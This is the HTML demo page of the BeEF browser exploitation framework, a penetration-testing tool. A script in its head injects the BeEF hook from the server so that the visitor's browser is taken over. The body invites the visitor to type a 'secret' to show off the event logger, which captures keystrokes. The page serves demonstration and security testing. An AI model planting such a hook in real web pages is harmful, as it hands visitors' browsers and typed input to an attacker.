<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<!--
    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
-->
<head>
	<title>BeEF Basic Demo</title>
	<script>
		var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '<%= @hook_uri %>" type="text/javascript"><\/script>';
		document.write(commandModuleStr);
	</script>
</head>

<body>
	You should be hooked into <b>BeEF</b>.
	<p>
		Have fun while your browser is working against you.
	</p>
		
		These links are for demonstrating the "Get Page HREFs" command module<br />
	<ul>
	
	<li><a href="http://beefproject.com" target="_blank">The Browser Exploitation Framework Project homepage</a>
	<li><a href="http://ha.ckers.org/" target="_blank">ha.ckers.org homepage</a>
	<li><a href="http://slashdot.org/" target="_blank">Slashdot</a>

	</ul>

    <p>Have a go at the event logger.<br />
    <label for="imptxt">Insert your secret here:</label>&nbsp;&nbsp;<input type="text" id="imptxt" name="Important Text" /></p>
	
	<p>
		You can also load up a more advanced demo page <a href="butcher/index.html">here</a>
	</p>
	
</body>
</html>
